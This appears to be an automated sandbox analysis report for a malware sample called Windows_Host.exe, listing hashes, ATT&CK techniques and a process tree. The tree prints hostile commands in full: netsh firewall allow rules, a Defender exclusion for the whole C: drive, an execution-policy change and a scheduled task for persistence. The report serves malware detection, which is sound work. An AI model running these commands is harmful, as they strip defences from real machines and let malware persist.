3dcc436b69d621e1d71123ac70836d6f861ba82fc6551390d6702a9670d07767

Analysis

max time kernel
136s
max time network
180s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
23-09-2022 06:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Windows_Host.exe
Size

23KB
MD5

e741d5bfc78ea9002c079dc8aeee3a19
SHA1

67e008479b7b59af8af6a697a9a8631f8973ed0a
SHA256

3dcc436b69d621e1d71123ac70836d6f861ba82fc6551390d6702a9670d07767
SHA512

e8dd44773abfc86de1a234e33b850b86d762d32232c056b5362857b9f6293ade6fd9164a4eb6e88053eefa01415dfd4da49bab29d6d25fd2f0b565745cb9166c
SSDEEP

384:mE+EVqGOu+2HS5BE+ERWzMIQdkROJoJmxIit2XXRqb3RXCROCPxh91aTRRbuwv9+:m9EVM2u9ERunQDxIitPbto7vaT194zrd

Score

8^/10

evasion persistence

Malware Config

Signatures

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

dllhost.exedllhost.exe

pid process

3648 dllhost.exe
1560 dllhost.exe

pid	process
3648	dllhost.exe
1560	dllhost.exe

Modifies Windows Firewall 1 TTPs 16 IoCs

evasion

Modify Existing Service

T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
2936	netsh.exe
2428	netsh.exe
3464	netsh.exe
3488	netsh.exe
2256	netsh.exe
4540	netsh.exe
4140	netsh.exe
480	netsh.exe
4888	netsh.exe
2088	netsh.exe
1712	netsh.exe
4388	netsh.exe
4168	netsh.exe
1832	netsh.exe
4948	netsh.exe
4700	netsh.exe

Registers COM server for autorun 1 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

dxdiag.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Windows_Host.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	Windows_Host.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 19 IoCs

Processes:

dxdiag.exeWindows_Host.exe

description	ioc	process
File created	\??\c:\windows\system32\driverstore\filerepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\input.inf_amd64_adeb6424513f60a2\input.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_b748590104fe1c15\machine.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\machine.inf_amd64_b748590104fe1c15\machine.PNF	dxdiag.exe
File created	C:\Windows\System32\ShellExperiences\Windows Host.xml	Windows_Host.exe
File created	C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_adeb6424513f60a2\input.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF	dxdiag.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4876 1640 WerFault.exe Windows_Host.exe

pid	pid_target	process	target process
4876	1640	WerFault.exe	Windows_Host.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

dxdiag.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dxdiag.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4964 schtasks.exe
4724 schtasks.exe

pid	process
4964	schtasks.exe
4724	schtasks.exe

Modifies registry class 35 IoCs

Processes:

dxdiag.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1	dxdiag.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2891029575-1462575-1165213807-1000\{B4572C1E-D320-4142-A374-B67C58BB8C78}	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable"	dxdiag.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Windows_Host.exepowershell.exepowershell.exepowershell.exedxdiag.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1640	Windows_Host.exe
1616	powershell.exe
1616	powershell.exe
1736	powershell.exe
4008	powershell.exe
1736	powershell.exe
4008	powershell.exe
1736	powershell.exe
4128	dxdiag.exe
4128	dxdiag.exe
1640	Windows_Host.exe
1640	Windows_Host.exe
1796	powershell.exe
1796	powershell.exe
1796	powershell.exe
1796	powershell.exe
1796	powershell.exe
1796	powershell.exe
1640	Windows_Host.exe
1640	Windows_Host.exe
1640	Windows_Host.exe
816	powershell.exe
816	powershell.exe
816	powershell.exe
816	powershell.exe
816	powershell.exe
816	powershell.exe
1640	Windows_Host.exe
1640	Windows_Host.exe
2136	powershell.exe
2136	powershell.exe
2136	powershell.exe
2136	powershell.exe
2136	powershell.exe
2136	powershell.exe
1640	Windows_Host.exe
1640	Windows_Host.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
1640	Windows_Host.exe
1640	Windows_Host.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
1640	Windows_Host.exe
1640	Windows_Host.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
1640	Windows_Host.exe
1640	Windows_Host.exe
1264	powershell.exe
1264	powershell.exe
1264	powershell.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

Processes:

Windows_Host.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1640	Windows_Host.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	816	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	4424	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	260	powershell.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	4988	powershell.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

dxdiag.exe

pid process

4128 dxdiag.exe

pid	process
4128	dxdiag.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Windows_Host.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedllhost.exe

description	pid	process	target process
PID 1640 wrote to memory of 3144	1640	Windows_Host.exe	cmd.exe
PID 1640 wrote to memory of 3144	1640	Windows_Host.exe	cmd.exe
PID 1640 wrote to memory of 1616	1640	Windows_Host.exe	powershell.exe
PID 1640 wrote to memory of 1616	1640	Windows_Host.exe	powershell.exe
PID 3144 wrote to memory of 4948	3144	cmd.exe	netsh.exe
PID 3144 wrote to memory of 4948	3144	cmd.exe	netsh.exe
PID 1640 wrote to memory of 3084	1640	Windows_Host.exe	cmd.exe
PID 1640 wrote to memory of 3084	1640	Windows_Host.exe	cmd.exe
PID 1640 wrote to memory of 1736	1640	Windows_Host.exe	powershell.exe
PID 1640 wrote to memory of 1736	1640	Windows_Host.exe	powershell.exe
PID 3144 wrote to memory of 2936	3144	cmd.exe	netsh.exe
PID 3144 wrote to memory of 2936	3144	cmd.exe	netsh.exe
PID 1640 wrote to memory of 2312	1640	Windows_Host.exe	cmd.exe
PID 1640 wrote to memory of 2312	1640	Windows_Host.exe	cmd.exe
PID 1640 wrote to memory of 4008	1640	Windows_Host.exe	powershell.exe
PID 1640 wrote to memory of 4008	1640	Windows_Host.exe	powershell.exe
PID 1640 wrote to memory of 1884	1640	Windows_Host.exe	cmd.exe
PID 1640 wrote to memory of 1884	1640	Windows_Host.exe	cmd.exe
PID 3084 wrote to memory of 4964	3084	cmd.exe	schtasks.exe
PID 3084 wrote to memory of 4964	3084	cmd.exe	schtasks.exe
PID 1640 wrote to memory of 3188	1640	Windows_Host.exe	cmd.exe
PID 1640 wrote to memory of 3188	1640	Windows_Host.exe	cmd.exe
PID 2312 wrote to memory of 4540	2312	cmd.exe	netsh.exe
PID 2312 wrote to memory of 4540	2312	cmd.exe	netsh.exe
PID 1884 wrote to memory of 4724	1884	cmd.exe	schtasks.exe
PID 1884 wrote to memory of 4724	1884	cmd.exe	schtasks.exe
PID 3144 wrote to memory of 4388	3144	cmd.exe	netsh.exe
PID 3144 wrote to memory of 4388	3144	cmd.exe	netsh.exe
PID 3188 wrote to memory of 4140	3188	cmd.exe	netsh.exe
PID 3188 wrote to memory of 4140	3188	cmd.exe	netsh.exe
PID 1640 wrote to memory of 3380	1640	Windows_Host.exe	cmd.exe
PID 1640 wrote to memory of 3380	1640	Windows_Host.exe	cmd.exe
PID 3144 wrote to memory of 480	3144	cmd.exe	netsh.exe
PID 3144 wrote to memory of 480	3144	cmd.exe	netsh.exe
PID 3380 wrote to memory of 4128	3380	cmd.exe	dxdiag.exe
PID 3380 wrote to memory of 4128	3380	cmd.exe	dxdiag.exe
PID 2312 wrote to memory of 4700	2312	cmd.exe	netsh.exe
PID 2312 wrote to memory of 4700	2312	cmd.exe	netsh.exe
PID 3188 wrote to memory of 4168	3188	cmd.exe	netsh.exe
PID 3188 wrote to memory of 4168	3188	cmd.exe	netsh.exe
PID 3188 wrote to memory of 2428	3188	cmd.exe	netsh.exe
PID 3188 wrote to memory of 2428	3188	cmd.exe	netsh.exe
PID 2312 wrote to memory of 3464	2312	cmd.exe	netsh.exe
PID 2312 wrote to memory of 3464	2312	cmd.exe	netsh.exe
PID 3188 wrote to memory of 4888	3188	cmd.exe	netsh.exe
PID 3188 wrote to memory of 4888	3188	cmd.exe	netsh.exe
PID 2312 wrote to memory of 3488	2312	cmd.exe	netsh.exe
PID 2312 wrote to memory of 3488	2312	cmd.exe	netsh.exe
PID 1640 wrote to memory of 3612	1640	Windows_Host.exe	cmd.exe
PID 1640 wrote to memory of 3612	1640	Windows_Host.exe	cmd.exe
PID 3612 wrote to memory of 2088	3612	cmd.exe	netsh.exe
PID 3612 wrote to memory of 2088	3612	cmd.exe	netsh.exe
PID 3612 wrote to memory of 2256	3612	cmd.exe	netsh.exe
PID 3612 wrote to memory of 2256	3612	cmd.exe	netsh.exe
PID 3612 wrote to memory of 1712	3612	cmd.exe	netsh.exe
PID 3612 wrote to memory of 1712	3612	cmd.exe	netsh.exe
PID 1640 wrote to memory of 1796	1640	Windows_Host.exe	powershell.exe
PID 1640 wrote to memory of 1796	1640	Windows_Host.exe	powershell.exe
PID 3612 wrote to memory of 1832	3612	cmd.exe	netsh.exe
PID 3612 wrote to memory of 1832	3612	cmd.exe	netsh.exe
PID 1640 wrote to memory of 3648	1640	Windows_Host.exe	dllhost.exe
PID 1640 wrote to memory of 3648	1640	Windows_Host.exe	dllhost.exe
PID 3648 wrote to memory of 1560	3648	dllhost.exe	dllhost.exe
PID 3648 wrote to memory of 1560	3648	dllhost.exe	dllhost.exe

C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe
"C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe"
1⤵
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall delete rule name="Windows Host" dir=in & netsh advfirewall firewall delete rule name="Windows Host" dir=out & netsh advfirewall firewall add rule name ="Windows Host" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host" & netsh advfirewall firewall add rule name="Windows Host" dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host" &
2⤵
- Suspicious use of WriteProcessMemory
PID:3144

C:\Windows\system32\netsh.exe
netsh advfirewall firewall delete rule name="Windows Host" dir=in
3⤵
- Modifies Windows Firewall
PID:4948

C:\Windows\system32\netsh.exe
netsh advfirewall firewall delete rule name="Windows Host" dir=out
3⤵
- Modifies Windows Firewall
PID:2936

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name ="Windows Host" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host"
3⤵
- Modifies Windows Firewall
PID:4388

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Windows Host" dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host"
3⤵
- Modifies Windows Firewall
PID:480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /command Add-MpPreference -ExclusionPath "C:"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /TN "$77Windows Host" /XML "C:\Windows\System32\ShellExperiences\Windows Host.xml" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3084

C:\Windows\system32\schtasks.exe
schtasks /create /TN "$77Windows Host" /XML "C:\Windows\System32\ShellExperiences\Windows Host.xml" /f
3⤵
- Creates scheduled task(s)
PID:4964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /command set-executionpolicy remotesigned
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall delete rule name="Windows Host" dir=in & netsh advfirewall firewall delete rule name="Windows Host" dir=out & netsh advfirewall firewall add rule name ="Windows Host" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host" & netsh advfirewall firewall add rule name="Windows Host" dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host" &
2⤵
- Suspicious use of WriteProcessMemory
PID:2312

C:\Windows\system32\netsh.exe
netsh advfirewall firewall delete rule name="Windows Host" dir=in
3⤵
- Modifies Windows Firewall
PID:4540

C:\Windows\system32\netsh.exe
netsh advfirewall firewall delete rule name="Windows Host" dir=out
3⤵
- Modifies Windows Firewall
PID:4700

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name ="Windows Host" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host"
3⤵
- Modifies Windows Firewall
PID:3464

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Windows Host" dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host"
3⤵
- Modifies Windows Firewall
PID:3488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /command Add-MpPreference -ExclusionPath "C:"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /TN "$77Windows Host" /XML "C:\Windows\System32\ShellExperiences\Windows Host.xml" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\system32\schtasks.exe
schtasks /create /TN "$77Windows Host" /XML "C:\Windows\System32\ShellExperiences\Windows Host.xml" /f
3⤵
- Creates scheduled task(s)
PID:4724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall delete rule name="Windows Host" dir=in & netsh advfirewall firewall delete rule name="Windows Host" dir=out & netsh advfirewall firewall add rule name ="Windows Host" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host" & netsh advfirewall firewall add rule name="Windows Host" dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host" &
2⤵
- Suspicious use of WriteProcessMemory
PID:3188

C:\Windows\system32\netsh.exe
netsh advfirewall firewall delete rule name="Windows Host" dir=in
3⤵
- Modifies Windows Firewall
PID:4140

C:\Windows\system32\netsh.exe
netsh advfirewall firewall delete rule name="Windows Host" dir=out
3⤵
- Modifies Windows Firewall
PID:4168

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name ="Windows Host" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host"
3⤵
- Modifies Windows Firewall
PID:2428

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Windows Host" dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\Windows_Host.exe" enable=yes description="Windows Host"
3⤵
- Modifies Windows Firewall
PID:4888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c dxdiag /t "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\VideoDefault.txt"
2⤵
- Suspicious use of WriteProcessMemory
PID:3380

C:\Windows\system32\dxdiag.exe
dxdiag /t "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\VideoDefault.txt"
3⤵
- Registers COM server for autorun
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall delete rule name="Windows Host" dir=in & netsh advfirewall firewall delete rule name="Windows Host" dir=out & netsh advfirewall firewall add rule name ="Windows Host" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe" enable=yes description="Windows Host" & netsh advfirewall firewall add rule name="Windows Host" dir=out action=allow program="C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe" enable=yes description="Windows Host" &
2⤵
- Suspicious use of WriteProcessMemory
PID:3612

C:\Windows\system32\netsh.exe
netsh advfirewall firewall delete rule name="Windows Host" dir=in
3⤵
- Modifies Windows Firewall
PID:2088

C:\Windows\system32\netsh.exe
netsh advfirewall firewall delete rule name="Windows Host" dir=out
3⤵
- Modifies Windows Firewall
PID:2256

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name ="Windows Host" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe" enable=yes description="Windows Host"
3⤵
- Modifies Windows Firewall
PID:1712

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Windows Host" dir=out action=allow program="C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe" enable=yes description="Windows Host"
3⤵
- Modifies Windows Firewall
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe
